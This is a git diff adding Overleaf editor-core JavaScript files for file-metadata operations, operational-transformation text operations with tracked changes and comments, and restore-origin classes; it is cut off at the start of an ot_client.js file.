diff --git a/libraries/overleaf-editor-core/lib/operation/set_file_metadata_operation.js b/libraries/overleaf-editor-core/lib/operation/set_file_metadata_operation.js
new file mode 100644
index 0000000..5bdd00f
--- /dev/null
+++ b/libraries/overleaf-editor-core/lib/operation/set_file_metadata_operation.js
@@ -0,0 +1,53 @@
+'use strict'
+
+const _ = require('lodash')
+const assert = require('check-types').assert
+
+const Operation = require('./')
+
+/**
+ * Sets the metadata of a file in a project.
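+ *
+ * For example (illustrative metadata), applying
+ * new SetFileMetadataOperation('main.tex', { main: true }) replaces the
+ * metadata object stored for main.tex in the target snapshot.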
+ */ +class SetFileMetadataOperation extends Operation { + /** + * @param {string} pathname + * @param {Object} metadata + */ + constructor(pathname, metadata) { + super() + assert.string(pathname, 'SetFileMetadataOperation: bad pathname') + assert.object(metadata, 'SetFileMetadataOperation: bad metadata') + + this.pathname = pathname + this.metadata = metadata + } + + /** + * @inheritdoc + */ + toRaw() { + return { + pathname: this.pathname, + metadata: _.cloneDeep(this.metadata), + } + } + + getPathname() { + return this.pathname + } + + getMetadata() { + return this.metadata + } + + /** + * @inheritdoc + */ + applyTo(snapshot) { + const file = snapshot.getFile(this.pathname) + if (!file) return + file.setMetadata(this.metadata) + } +} + +module.exports = SetFileMetadataOperation diff --git a/libraries/overleaf-editor-core/lib/operation/text_operation.js b/libraries/overleaf-editor-core/lib/operation/text_operation.js new file mode 100644 index 0000000..148570f --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/text_operation.js @@ -0,0 +1,929 @@ +// @ts-check +/** + * The text operation from OT.js with some minor cosmetic changes. + * + * Specifically, this is based on + * https://github.com/Operational-Transformation/ot.js/ + * blob/298825f58fb51fefb352e7df5ddbc668f4d5646f/lib/text-operation.js + * from 18 Mar 2013. + */ + +'use strict' +const containsNonBmpChars = require('../util').containsNonBmpChars +const EditOperation = require('./edit_operation') +const { + RetainOp, + InsertOp, + RemoveOp, + isRetain, + isInsert, + isRemove, +} = require('./scan_op') +const { + UnprocessableError, + ApplyError, + InvalidInsertionError, + TooLongError, +} = require('../errors') +const Range = require('../range') +const ClearTrackingProps = require('../file_data/clear_tracking_props') +const TrackingProps = require('../file_data/tracking_props') + +/** + * @import StringFileData from '../file_data/string_file_data' + * @import { RawTextOperation, TrackingDirective } from '../types' + * @import { ScanOp } from '../operation/scan_op' + * @import TrackedChangeList from '../file_data/tracked_change_list' + * + * @typedef {{tracking?: TrackingProps, commentIds?: string[]}} InsertOptions + */ + +/** + * Create an empty text operation. + * @extends EditOperation + */ +class TextOperation extends EditOperation { + /** + * Length of the longest file that we'll attempt to edit, in characters. + * + * @type {number} + */ + static MAX_STRING_LENGTH = 2 * Math.pow(1024, 2) + static UnprocessableError = UnprocessableError + static ApplyError = ApplyError + static InvalidInsertionError = InvalidInsertionError + static TooLongError = TooLongError + + constructor() { + super() + + /** + * When an operation is applied to an input string, you can think of this as + * if an imaginary cursor runs over the entire string and skips over some + * parts, removes some parts and inserts characters at some positions. These + * actions (skip/remove/insert) are stored as an array in the "ops" property. + * @type {ScanOp[]} + */ + this.ops = [] + + /** + * An operation's baseLength is the length of every string the operation + * can be applied to. + */ + this.baseLength = 0 + + /** + * The targetLength is the length of every string that results from applying + * the operation on a valid input string. 
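+     *
+     * For example (illustrative): new TextOperation().retain(2).insert('ab').remove(1)
+     * has baseLength 3 and targetLength 4; it maps 'abc' to 'abab'.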
+ */ + this.targetLength = 0 + + /** + * The expected content hash after this operation is applied + * + * @type {string | null} + */ + this.contentHash = null + } + + /** + * @param {TextOperation} other + * @return {boolean} + */ + equals(other) { + if (this.baseLength !== other.baseLength) { + return false + } + if (this.targetLength !== other.targetLength) { + return false + } + if (this.ops.length !== other.ops.length) { + return false + } + for (let i = 0; i < this.ops.length; i++) { + if (!this.ops[i].equals(other.ops[i])) { + return false + } + } + return true + } + + // After an operation is constructed, the user of the library can specify the + // actions of an operation (skip/insert/remove) with these three builder + // methods. They all return the operation for convenient chaining. + + /** + * Skip over a given number of characters. + * @param {number | {r: number}} n + * @param {{tracking?: TrackingDirective}} opts + * @returns {TextOperation} + */ + retain(n, opts = {}) { + if (n === 0) { + return this + } + + if (!isRetain(n)) { + throw new Error('retain expects an integer or a retain object') + } + const newOp = RetainOp.fromJSON(n) + newOp.tracking = opts.tracking + + if (newOp.length === 0) { + return this + } + + this.baseLength += newOp.length + this.targetLength += newOp.length + + const lastOperation = this.ops[this.ops.length - 1] + if (lastOperation?.canMergeWith(newOp)) { + // The last op is a retain op => we can merge them into one op. + lastOperation.mergeWith(newOp) + } else { + // Create a new op. + this.ops.push(newOp) + } + return this + } + + /** + * Insert a string at the current position. + * @param {string | {i: string}} insertValue + * @param {InsertOptions} opts + * @returns {TextOperation} + */ + insert(insertValue, opts = {}) { + if (!isInsert(insertValue)) { + throw new Error('insert expects a string or an insert object') + } + const newOp = InsertOp.fromJSON(insertValue) + newOp.tracking = opts.tracking + newOp.commentIds = opts.commentIds + if (newOp.insertion === '') { + return this + } + this.targetLength += newOp.insertion.length + const ops = this.ops + const lastOp = this.ops[this.ops.length - 1] + if (lastOp?.canMergeWith(newOp)) { + // Merge insert op. + lastOp.mergeWith(newOp) + } else if (lastOp instanceof RemoveOp) { + // It doesn't matter when an operation is applied whether the operation + // is remove(3), insert("something") or insert("something"), remove(3). + // Here we enforce that in this case, the insert op always comes first. + // This makes all operations that have the same effect when applied to + // a document of the right length equal in respect to the `equals` method. + const secondToLastOp = ops[ops.length - 2] + if (secondToLastOp?.canMergeWith(newOp)) { + secondToLastOp.mergeWith(newOp) + } else { + ops[ops.length] = ops[ops.length - 1] + ops[ops.length - 2] = newOp + } + } else { + ops.push(newOp) + } + return this + } + + /** + * Remove a string at the current position. 
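+   * For illustration, remove(3) and remove('abc') are equivalent: both
+   * consume three characters of the input.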
+ * @param {number | string} n + * @returns {TextOperation} + */ + remove(n) { + if (typeof n === 'string') { + n = n.length + } + if (typeof n !== 'number') { + throw new Error('remove expects an integer or a string') + } + if (n === 0) { + return this + } + if (n > 0) { + n = -n + } + const newOp = RemoveOp.fromJSON(n) + this.baseLength -= n + const lastOp = this.ops[this.ops.length - 1] + if (lastOp?.canMergeWith(newOp)) { + lastOp.mergeWith(newOp) + } else { + this.ops.push(newOp) + } + return this + } + + /** + * Tests whether this operation has no effect. + */ + isNoop() { + return ( + this.ops.length === 0 || + (this.ops.length === 1 && this.ops[0] instanceof RetainOp) + ) + } + + /** + * Pretty printing. + */ + toString() { + return this.ops.map(op => op.toString()).join(', ') + } + + /** + * @inheritdoc + * @returns {RawTextOperation} + */ + toJSON() { + /** @type {RawTextOperation} */ + const json = { textOperation: this.ops.map(op => op.toJSON()) } + if (this.contentHash != null) { + json.contentHash = this.contentHash + } + return json + } + + /** + * Converts a plain JS object into an operation and validates it. + * @param {RawTextOperation} obj + * @returns {TextOperation} + */ + static fromJSON = function ({ textOperation: ops, contentHash }) { + const o = new TextOperation() + for (const op of ops) { + if (isRetain(op)) { + const retain = RetainOp.fromJSON(op) + o.retain(retain.length, { tracking: retain.tracking }) + } else if (isInsert(op)) { + const insert = InsertOp.fromJSON(op) + o.insert(insert.insertion, { + commentIds: insert.commentIds, + tracking: insert.tracking, + }) + } else if (isRemove(op)) { + const remove = RemoveOp.fromJSON(op) + o.remove(-remove.length) + } else { + throw new UnprocessableError('unknown operation: ' + JSON.stringify(op)) + } + } + if (contentHash != null) { + o.contentHash = contentHash + } + return o + } + + /** + * Apply an operation to a string, returning a new string. Throws an error if + * there's a mismatch between the input string and the operation. 
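+   *
+   * A sketch of typical usage (assuming StringFileData.fromRaw from
+   * ../file_data/string_file_data):
+   * @example
+   * const file = StringFileData.fromRaw({ content: 'aaabbb' })
+   * TextOperation.fromJSON({ textOperation: [3, 'x', -3] }).apply(file)
+   * // file.getContent() === 'aaax'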
+   * @override
+   * @inheritdoc
+   * @param {StringFileData} file
+   */
+  apply(file) {
+    const str = file.getContent()
+    const operation = this
+    if (containsNonBmpChars(str)) {
+      throw new TextOperation.ApplyError(
+        'The string contains non BMP characters.',
+        operation,
+        str
+      )
+    }
+    if (str.length !== operation.baseLength) {
+      throw new TextOperation.ApplyError(
+        "The operation's base length must be equal to the string's length.",
+        operation,
+        str
+      )
+    }
+
+    const ops = this.ops
+    let inputCursor = 0
+    let result = ''
+    for (const op of ops) {
+      if (op instanceof RetainOp) {
+        if (inputCursor + op.length > str.length) {
+          throw new ApplyError(
+            "Operation can't retain more chars than are left in the string.",
+            op.toJSON(),
+            str
+          )
+        }
+        file.trackedChanges.applyRetain(result.length, op.length, {
+          tracking: op.tracking,
+        })
+        result += str.slice(inputCursor, inputCursor + op.length)
+        inputCursor += op.length
+      } else if (op instanceof InsertOp) {
+        if (containsNonBmpChars(op.insertion)) {
+          throw new InvalidInsertionError(str, op.toJSON())
+        }
+        file.trackedChanges.applyInsert(result.length, op.insertion, {
+          tracking: op.tracking,
+        })
+        file.comments.applyInsert(
+          new Range(result.length, op.insertion.length),
+          { commentIds: op.commentIds }
+        )
+        result += op.insertion
+      } else if (op instanceof RemoveOp) {
+        file.trackedChanges.applyDelete(result.length, op.length)
+        file.comments.applyDelete(new Range(result.length, op.length))
+        inputCursor += op.length
+      } else {
+        throw new UnprocessableError('Unknown ScanOp type during apply')
+      }
+    }
+
+    if (inputCursor !== str.length) {
+      throw new TextOperation.ApplyError(
+        "The operation didn't operate on the whole string.",
+        operation,
+        str
+      )
+    }
+
+    if (result.length > TextOperation.MAX_STRING_LENGTH) {
+      throw new TextOperation.TooLongError(operation, result.length)
+    }
+
+    file.content = result
+  }
+
+  /**
+   * @inheritdoc
+   * @param {number} length of the original string; non-negative
+   * @return {number} length of the new string; non-negative
+   */
+  applyToLength(length) {
+    const operation = this
+    if (length !== operation.baseLength) {
+      throw new TextOperation.ApplyError(
+        "The operation's base length must be equal to the string's length.",
+        operation,
+        length
+      )
+    }
+
+    const { length: newLength, inputCursor } = this.ops.reduce(
+      (intermediate, op) => op.applyToLength(intermediate),
+      { length: 0, inputCursor: 0, inputLength: length }
+    )
+
+    if (inputCursor !== length) {
+      throw new TextOperation.ApplyError(
+        "The operation didn't operate on the whole string.",
+        operation,
+        length
+      )
+    }
+    if (newLength > TextOperation.MAX_STRING_LENGTH) {
+      throw new TextOperation.TooLongError(operation, newLength)
+    }
+    return newLength
+  }
+
+  /**
+   * @inheritdoc
+   * @param {StringFileData} previousState
+   */
+  invert(previousState) {
+    const str = previousState.getContent()
+    let strIndex = 0
+    const inverse = new TextOperation()
+    const ops = this.ops
+    for (let i = 0, l = ops.length; i < l; i++) {
+      const op = ops[i]
+      if (op instanceof RetainOp) {
+        // Where we need to end up after the retains
+        const target = strIndex + op.length
+        // A previous retain could have overridden some tracking info. Now we
+        // need to restore it.
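+        // (The lookup below gathers every tracked change that overlapped the
+        // retained span in the previous state, so that each piece can be
+        // retained with its original tracking props.)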
+ const previousRanges = previousState.trackedChanges.inRange( + new Range(strIndex, op.length) + ) + + let removeTrackingInfoIfNeeded + if (op.tracking) { + removeTrackingInfoIfNeeded = new ClearTrackingProps() + } + + for (const trackedChange of previousRanges) { + if (strIndex < trackedChange.range.start) { + inverse.retain(trackedChange.range.start - strIndex, { + tracking: removeTrackingInfoIfNeeded, + }) + strIndex = trackedChange.range.start + } + if (trackedChange.range.end < strIndex + op.length) { + inverse.retain(trackedChange.range.length, { + tracking: trackedChange.tracking, + }) + strIndex = trackedChange.range.end + } + if (trackedChange.range.end !== strIndex) { + // No need to split the range at the end + const [left] = trackedChange.range.splitAt(strIndex) + inverse.retain(left.length, { tracking: trackedChange.tracking }) + strIndex = left.end + } + } + if (strIndex < target) { + inverse.retain(target - strIndex, { + tracking: removeTrackingInfoIfNeeded, + }) + strIndex = target + } + } else if (op instanceof InsertOp) { + inverse.remove(op.insertion.length) + } else if (op instanceof RemoveOp) { + const segments = calculateTrackingCommentSegments( + strIndex, + op.length, + previousState.comments, + previousState.trackedChanges + ) + for (const segment of segments) { + inverse.insert(str.slice(strIndex, strIndex + segment.length), { + tracking: segment.tracking, + commentIds: segment.commentIds, + }) + strIndex += segment.length + } + } else { + throw new UnprocessableError('unknown scanop during inversion') + } + } + return inverse + } + + /** + * @inheritdoc + * @param {EditOperation} other + */ + canBeComposedWithForUndo(other) { + if (!(other instanceof TextOperation)) { + return false + } + + if (this.isNoop() || other.isNoop()) { + return true + } + + const startA = getStartIndex(this) + const startB = getStartIndex(other) + const simpleA = getSimpleOp(this) + const simpleB = getSimpleOp(other) + if (!simpleA || !simpleB) { + return false + } + + if (simpleA instanceof InsertOp && simpleB instanceof InsertOp) { + return startA + simpleA.insertion.length === startB + } + + if (simpleA instanceof RemoveOp && simpleB instanceof RemoveOp) { + // there are two possibilities to delete: with backspace and with the + // delete key. 
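+      // Backspace-style deletion ends where the earlier edit began;
+      // delete-key deletion starts at the same index both times.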
+ return startB + simpleB.length === startA || startA === startB + } + + return false + } + + /** + * @inheritdoc + * @param {EditOperation} other + */ + canBeComposedWith(other) { + if (!(other instanceof TextOperation)) { + return false + } + return this.targetLength === other.baseLength + } + + /** + * @inheritdoc + * @param {EditOperation} operation2 + */ + compose(operation2) { + if (!(operation2 instanceof TextOperation)) { + throw new Error( + `Trying to compose TextOperation with ${operation2?.constructor?.name}.` + ) + } + const operation1 = this + if (operation1.targetLength !== operation2.baseLength) { + throw new Error( + 'The base length of the second operation has to be the ' + + 'target length of the first operation' + ) + } + + const operation = new TextOperation() // the combined operation + const ops1 = operation1.ops + const ops2 = operation2.ops // for fast access + let i1 = 0 + let i2 = 0 // current index into ops1 respectively ops2 + let op1 = ops1[i1++] + let op2 = ops2[i2++] // current ops + for (;;) { + // Dispatch on the type of op1 and op2 + if (typeof op1 === 'undefined' && typeof op2 === 'undefined') { + // end condition: both ops1 and ops2 have been processed + break + } + + if (op1 instanceof RemoveOp) { + operation.remove(-op1.length) + op1 = ops1[i1++] + continue + } + + if (op2 instanceof InsertOp) { + operation.insert(op2.insertion, { + tracking: op2.tracking, + commentIds: op2.commentIds, + }) + op2 = ops2[i2++] + continue + } + + if (typeof op1 === 'undefined') { + throw new Error( + 'Cannot compose operations: first operation is too short.' + ) + } + if (typeof op2 === 'undefined') { + throw new Error( + 'Cannot compose operations: first operation is too long.' + ) + } + + if (op1 instanceof RetainOp && op2 instanceof RetainOp) { + // If both have tracking info, use the latter one. Otherwise use the + // tracking info from the former. + const tracking = op2.tracking ?? 
op1.tracking + if (op1.length > op2.length) { + operation.retain(op2.length, { + tracking, + }) + op1 = new RetainOp(op1.length - op2.length, op1.tracking) + op2 = ops2[i2++] + } else if (op1.length === op2.length) { + operation.retain(op1.length, { + tracking, + }) + op1 = ops1[i1++] + op2 = ops2[i2++] + } else { + operation.retain(op1.length, { + tracking, + }) + op2 = new RetainOp(op2.length - op1.length, op2.tracking) + op1 = ops1[i1++] + } + } else if (op1 instanceof InsertOp && op2 instanceof RemoveOp) { + if (op1.insertion.length > op2.length) { + op1 = new InsertOp( + op1.insertion.slice(op2.length), + op1.tracking, + op1.commentIds + ) + op2 = ops2[i2++] + } else if (op1.insertion.length === op2.length) { + op1 = ops1[i1++] + op2 = ops2[i2++] + } else { + op2 = RemoveOp.fromJSON(op1.insertion.length - op2.length) + op1 = ops1[i1++] + } + } else if (op1 instanceof InsertOp && op2 instanceof RetainOp) { + /** @type InsertOptions */ + const opts = { + commentIds: op1.commentIds, + } + if (op2.tracking instanceof TrackingProps) { + // Prefer the tracking info on the second operation + opts.tracking = op2.tracking + } else if (!(op2.tracking instanceof ClearTrackingProps)) { + // The second operation does not cancel the first operation's tracking + opts.tracking = op1.tracking + } + if (op1.insertion.length > op2.length) { + operation.insert(op1.insertion.slice(0, op2.length), opts) + op1 = new InsertOp( + op1.insertion.slice(op2.length), + op1.tracking, + op1.commentIds + ) + op2 = ops2[i2++] + } else if (op1.insertion.length === op2.length) { + operation.insert(op1.insertion, opts) + op1 = ops1[i1++] + op2 = ops2[i2++] + } else { + operation.insert(op1.insertion, opts) + op2 = new RetainOp(op2.length - op1.insertion.length, op2.tracking) + op1 = ops1[i1++] + } + } else if (op1 instanceof RetainOp && op2 instanceof RemoveOp) { + if (op1.length > op2.length) { + operation.remove(-op2.length) + op1 = new RetainOp(op1.length - op2.length, op1.tracking) + op2 = ops2[i2++] + } else if (op1.length === op2.length) { + operation.remove(-op2.length) + op1 = ops1[i1++] + op2 = ops2[i2++] + } else { + operation.remove(op1.length) + op2 = RemoveOp.fromJSON(op1.length - op2.length) + op1 = ops1[i1++] + } + } else { + throw new Error( + "This shouldn't happen: op1: " + + JSON.stringify(op1) + + ', op2: ' + + JSON.stringify(op2) + ) + } + } + return operation + } + + /** + * Transform takes two operations A and B that happened concurrently and + * produces two operations A' and B' (in an array) such that + * `apply(apply(S, A), B') = apply(apply(S, B), A')`. This function is the + * heart of OT. + * @param {TextOperation} operation1 + * @param {TextOperation} operation2 + * @returns {[TextOperation, TextOperation]} + */ + static transform(operation1, operation2) { + if (operation1.baseLength !== operation2.baseLength) { + throw new Error('Both operations have to have the same base length') + } + + const operation1prime = new TextOperation() + const operation2prime = new TextOperation() + const ops1 = operation1.ops + const ops2 = operation2.ops + let i1 = 0 + let i2 = 0 + let op1 = ops1[i1++] + let op2 = ops2[i2++] + for (;;) { + // At every iteration of the loop, the imaginary cursor that both + // operation1 and operation2 have that operates on the input string must + // have the same position in the input string. 
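+      // Whenever one side's current op is fully consumed, the next op from
+      // that side is fetched, so both cursors advance over the input in
+      // lockstep.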
+ + if (typeof op1 === 'undefined' && typeof op2 === 'undefined') { + // end condition: both ops1 and ops2 have been processed + break + } + + // next two cases: one or both ops are insert ops + // => insert the string in the corresponding prime operation, skip it in + // the other one. If both op1 and op2 are insert ops, prefer op1. + if (op1 instanceof InsertOp) { + operation1prime.insert(op1.insertion, { + tracking: op1.tracking, + commentIds: op1.commentIds, + }) + operation2prime.retain(op1.insertion.length) + op1 = ops1[i1++] + continue + } + if (op2 instanceof InsertOp) { + operation1prime.retain(op2.insertion.length) + operation2prime.insert(op2.insertion, { + tracking: op2.tracking, + commentIds: op2.commentIds, + }) + op2 = ops2[i2++] + continue + } + + if (typeof op1 === 'undefined') { + throw new Error( + 'Cannot compose operations: first operation is too short.' + ) + } + if (typeof op2 === 'undefined') { + throw new Error( + 'Cannot compose operations: first operation is too long.' + ) + } + + let minl + if (op1 instanceof RetainOp && op2 instanceof RetainOp) { + // Simple case: retain/retain + + // If both have tracking info, we use the one from op1 + /** @type {TrackingProps | ClearTrackingProps | undefined} */ + let operation1primeTracking + /** @type {TrackingProps | ClearTrackingProps | undefined} */ + let operation2primeTracking + if (op1.tracking) { + operation1primeTracking = op1.tracking + } else { + operation2primeTracking = op2.tracking + } + + if (op1.length > op2.length) { + minl = op2.length + op1 = new RetainOp(op1.length - op2.length, op1.tracking) + op2 = ops2[i2++] + } else if (op1.length === op2.length) { + minl = op2.length + op1 = ops1[i1++] + op2 = ops2[i2++] + } else { + minl = op1.length + op2 = new RetainOp(op2.length - op1.length, op2.tracking) + op1 = ops1[i1++] + } + operation1prime.retain(minl, { tracking: operation1primeTracking }) + operation2prime.retain(minl, { tracking: operation2primeTracking }) + } else if (op1 instanceof RemoveOp && op2 instanceof RemoveOp) { + // Both operations remove the same string at the same position. We don't + // need to produce any operations, we just skip over the remove ops and + // handle the case that one operation removes more than the other. 
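+        // (RemoveOp.fromJSON expects the raw negative form, which is why the
+        // leftover length is computed here as a negative number.)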
+        if (op1.length > op2.length) {
+          op1 = RemoveOp.fromJSON(op2.length - op1.length)
+          op2 = ops2[i2++]
+        } else if (op1.length === op2.length) {
+          op1 = ops1[i1++]
+          op2 = ops2[i2++]
+        } else {
+          op2 = RemoveOp.fromJSON(op1.length - op2.length)
+          op1 = ops1[i1++]
+        }
+        // next two cases: remove/retain and retain/remove
+      } else if (op1 instanceof RemoveOp && op2 instanceof RetainOp) {
+        if (op1.length > op2.length) {
+          minl = op2.length
+          op1 = RemoveOp.fromJSON(op2.length - op1.length)
+          op2 = ops2[i2++]
+        } else if (op1.length === op2.length) {
+          minl = op2.length
+          op1 = ops1[i1++]
+          op2 = ops2[i2++]
+        } else {
+          minl = op1.length
+          op2 = new RetainOp(op2.length - op1.length, op2.tracking)
+          op1 = ops1[i1++]
+        }
+        operation1prime.remove(minl)
+      } else if (op1 instanceof RetainOp && op2 instanceof RemoveOp) {
+        if (op1.length > op2.length) {
+          minl = op2.length
+          op1 = new RetainOp(op1.length - op2.length, op1.tracking)
+          op2 = ops2[i2++]
+        } else if (op1.length === op2.length) {
+          minl = op1.length
+          op1 = ops1[i1++]
+          op2 = ops2[i2++]
+        } else {
+          minl = op1.length
+          op2 = RemoveOp.fromJSON(op1.length - op2.length)
+          op1 = ops1[i1++]
+        }
+        operation2prime.remove(minl)
+      } else {
+        throw new Error("The two operations aren't compatible")
+      }
+    }
+
+    return [operation1prime, operation2prime]
+  }
+}
+
+// Operations are essentially lists of ops. There are three types of ops:
+//
+// * Retain ops: Advance the cursor position by a given number of characters.
+//   Represented by positive ints.
+// * Insert ops: Insert a given string at the current cursor position.
+//   Represented by strings.
+// * Remove ops: Remove the next n characters. Represented by negative ints.
+
+/**
+ *
+ * @param {TextOperation} operation
+ * @returns {ScanOp | null}
+ */
+function getSimpleOp(operation) {
+  const ops = operation.ops
+  switch (ops.length) {
+    case 1:
+      return ops[0]
+    case 2:
+      return ops[0] instanceof RetainOp
+        ? ops[1]
+        : ops[1] instanceof RetainOp
+          ? ops[0]
+          : null
+    case 3:
+      if (ops[0] instanceof RetainOp && ops[2] instanceof RetainOp) {
+        return ops[1]
+      }
+  }
+  return null
+}
+
+/**
+ * @param {TextOperation} operation
+ * @return {number}
+ */
+function getStartIndex(operation) {
+  if (operation.ops[0] instanceof RetainOp) {
+    return operation.ops[0].length
+  }
+  return 0
+}
+
+/**
+ * Constructs the segments defined as each overlapping range of tracked
+ * changes and comments. Each segment can have its own tracking props and
+ * attached comment ids.
+ *
+ * The quick brown fox jumps over the lazy dog
+ * Tracked inserts ---------- -----
+ * Tracked deletes ------
+ * Comment 1 -------
+ * Comment 2 ----
+ * Comment 3 -----------------
+ *
+ * Approx.
boundaries: | | | || | | | |
+ *
+ * @param {number} cursor
+ * @param {number} length
+ * @param {import('../file_data/comment_list')} commentsList
+ * @param {TrackedChangeList} trackedChangeList
+ * @returns {{length: number, commentIds?: string[], tracking?: TrackingProps}[]}
+ */
+function calculateTrackingCommentSegments(
+  cursor,
+  length,
+  commentsList,
+  trackedChangeList
+) {
+  const breaks = new Set()
+  const opStart = cursor
+  const opEnd = cursor + length
+  /**
+   * Utility function to limit breaks to the boundary set by the operation range
+   * @param {number} rangeBoundary
+   */
+  function addBreak(rangeBoundary) {
+    if (rangeBoundary < opStart || rangeBoundary > opEnd) {
+      return
+    }
+    breaks.add(rangeBoundary)
+  }
+  // Add comment boundaries
+  for (const comment of commentsList.comments.values()) {
+    for (const range of comment.ranges) {
+      addBreak(range.end)
+      addBreak(range.start)
+    }
+  }
+  // Add tracked change boundaries
+  for (const trackedChange of trackedChangeList.asSorted()) {
+    addBreak(trackedChange.range.start)
+    addBreak(trackedChange.range.end)
+  }
+  // Add operation boundaries
+  addBreak(opStart)
+  addBreak(opEnd)
+
+  // Sort the boundaries so that we can construct ranges between them
+  const sortedBreaks = Array.from(breaks).sort((a, b) => a - b)
+
+  const separateRanges = []
+  for (let i = 1; i < sortedBreaks.length; i++) {
+    const start = sortedBreaks[i - 1]
+    const end = sortedBreaks[i]
+    const currentRange = new Range(start, end - start)
+    // The comment ids that cover the current range are part of this sub-range
+    const commentIds = commentsList.idsCoveringRange(currentRange)
+    // The tracking info that covers the current range is part of this sub-range
+    const tracking = trackedChangeList.propsAtRange(currentRange)
+    separateRanges.push({
+      length: currentRange.length,
+      commentIds: commentIds.length > 0 ? commentIds : undefined,
+      tracking,
+    })
+  }
+  return separateRanges
+}
+
+module.exports = TextOperation
diff --git a/libraries/overleaf-editor-core/lib/origin/index.js b/libraries/overleaf-editor-core/lib/origin/index.js
new file mode 100644
index 0000000..6575157
--- /dev/null
+++ b/libraries/overleaf-editor-core/lib/origin/index.js
@@ -0,0 +1,64 @@
+'use strict'
+
+const assert = require('check-types').assert
+
+// Dependencies are loaded at the bottom of the file to mitigate circular
+// dependencies
+let RestoreOrigin = null
+let RestoreFileOrigin = null
+let RestoreProjectOrigin = null
+
+/**
+ * An Origin records where a {@link Change} came from. The Origin class handles
+ * simple tag origins, like "it came from rich text mode", or "it came from
+ * uploading files". Its subclasses record more detailed data for Changes such
+ * as restoring a version.
+ */
+class Origin {
+  /**
+   * @param {string} kind
+   */
+  constructor(kind) {
+    assert.string(kind, 'Origin: bad kind')
+
+    this.kind = kind
+  }
+
+  /**
+   * Create an Origin from its raw form.
+   *
+   * @param {Object} [raw]
+   * @return {Origin | null}
+   */
+  static fromRaw(raw) {
+    if (!raw) return null
+    if (raw.kind === RestoreOrigin.KIND) return RestoreOrigin.fromRaw(raw)
+    if (raw.kind === RestoreFileOrigin.KIND)
+      return RestoreFileOrigin.fromRaw(raw)
+    if (raw.kind === RestoreProjectOrigin.KIND)
+      return RestoreProjectOrigin.fromRaw(raw)
+    return new Origin(raw.kind)
+  }
+
+  /**
+   * Convert the Origin to raw form for storage or transmission.
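+   * For example, new Origin('test-origin').toRaw() returns
+   * { kind: 'test-origin' }, 'test-origin' being an illustrative kind.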
+ * + * @return {Object} + */ + toRaw() { + return { kind: this.kind } + } + + /** + * @return {string} + */ + getKind() { + return this.kind + } +} + +module.exports = Origin + +RestoreOrigin = require('./restore_origin') +RestoreFileOrigin = require('./restore_file_origin') +RestoreProjectOrigin = require('./restore_project_origin') diff --git a/libraries/overleaf-editor-core/lib/origin/restore_file_origin.js b/libraries/overleaf-editor-core/lib/origin/restore_file_origin.js new file mode 100644 index 0000000..6e42467 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/origin/restore_file_origin.js @@ -0,0 +1,62 @@ +'use strict' + +const assert = require('check-types').assert + +const Origin = require('.') + +class RestoreFileOrigin extends Origin { + /** + * @param {number} version that was restored + * @param {string} path that was restored + * @param {Date} timestamp from the restored version + */ + constructor(version, path, timestamp) { + assert.integer(version, 'RestoreFileOrigin: bad version') + assert.string(path, 'RestoreFileOrigin: bad path') + assert.date(timestamp, 'RestoreFileOrigin: bad timestamp') + + super(RestoreFileOrigin.KIND) + this.version = version + this.path = path + this.timestamp = timestamp + } + + static fromRaw(raw) { + return new RestoreFileOrigin(raw.version, raw.path, new Date(raw.timestamp)) + } + + /** @inheritdoc */ + toRaw() { + return { + kind: RestoreFileOrigin.KIND, + version: this.version, + path: this.path, + timestamp: this.timestamp.toISOString(), + } + } + + /** + * @return {number} + */ + getVersion() { + return this.version + } + + /** + * @return {string} + */ + getPath() { + return this.path + } + + /** + * @return {Date} + */ + getTimestamp() { + return this.timestamp + } +} + +RestoreFileOrigin.KIND = 'file-restore' + +module.exports = RestoreFileOrigin diff --git a/libraries/overleaf-editor-core/lib/origin/restore_origin.js b/libraries/overleaf-editor-core/lib/origin/restore_origin.js new file mode 100644 index 0000000..15bb425 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/origin/restore_origin.js @@ -0,0 +1,62 @@ +'use strict' + +const assert = require('check-types').assert + +const Origin = require('./') + +/** + * When a {@link Change} is generated by restoring a previous version, this + * records the original version. We also store the timestamp of the restored + * version for display; technically, this is redundant, because we could + * recover it using the version ID. However, it would be very expensive to + * recover all referenced versions, and it is also possible that the change + * for the restored version will no longer exist, either because it was merged + * with other changes or was deleted. 
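+ * For instance (illustrative values), new RestoreOrigin(42, new Date()) has
+ * the raw form { kind: 'restore', version: 42, timestamp: '...' }.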
+ * + * @see Origin + */ +class RestoreOrigin extends Origin { + /** + * @param {number} version that was restored + * @param {Date} timestamp from the restored version + */ + constructor(version, timestamp) { + assert.integer(version, 'RestoreOrigin: bad version') + assert.date(timestamp, 'RestoreOrigin: bad timestamp') + + super(RestoreOrigin.KIND) + this.version = version + this.timestamp = timestamp + } + + static fromRaw(raw) { + return new RestoreOrigin(raw.version, new Date(raw.timestamp)) + } + + /** @inheritdoc */ + toRaw() { + return { + kind: RestoreOrigin.KIND, + version: this.version, + timestamp: this.timestamp.toISOString(), + } + } + + /** + * @return {number} + */ + getVersion() { + return this.version + } + + /** + * @return {Date} + */ + getTimestamp() { + return this.timestamp + } +} + +RestoreOrigin.KIND = 'restore' + +module.exports = RestoreOrigin diff --git a/libraries/overleaf-editor-core/lib/origin/restore_project_origin.js b/libraries/overleaf-editor-core/lib/origin/restore_project_origin.js new file mode 100644 index 0000000..9db14b1 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/origin/restore_project_origin.js @@ -0,0 +1,51 @@ +'use strict' + +const assert = require('check-types').assert + +const Origin = require('.') + +class RestoreProjectOrigin extends Origin { + /** + * @param {number} version that was restored + * @param {Date} timestamp from the restored version + */ + constructor(version, timestamp) { + assert.integer(version, 'RestoreProjectOrigin: bad version') + assert.date(timestamp, 'RestoreProjectOrigin: bad timestamp') + + super(RestoreProjectOrigin.KIND) + this.version = version + this.timestamp = timestamp + } + + static fromRaw(raw) { + return new RestoreProjectOrigin(raw.version, new Date(raw.timestamp)) + } + + /** @inheritdoc */ + toRaw() { + return { + kind: RestoreProjectOrigin.KIND, + version: this.version, + timestamp: this.timestamp.toISOString(), + } + } + + /** + * @return {number} + */ + getVersion() { + return this.version + } + + /** + * @return {Date} + */ + getTimestamp() { + return this.timestamp + } +} + +RestoreProjectOrigin.KIND = 'project-restore' + +module.exports = RestoreProjectOrigin diff --git a/libraries/overleaf-editor-core/lib/ot_client.js b/libraries/overleaf-editor-core/lib/ot_client.js new file mode 100644 index 0000000..379f9bc --- /dev/null +++ 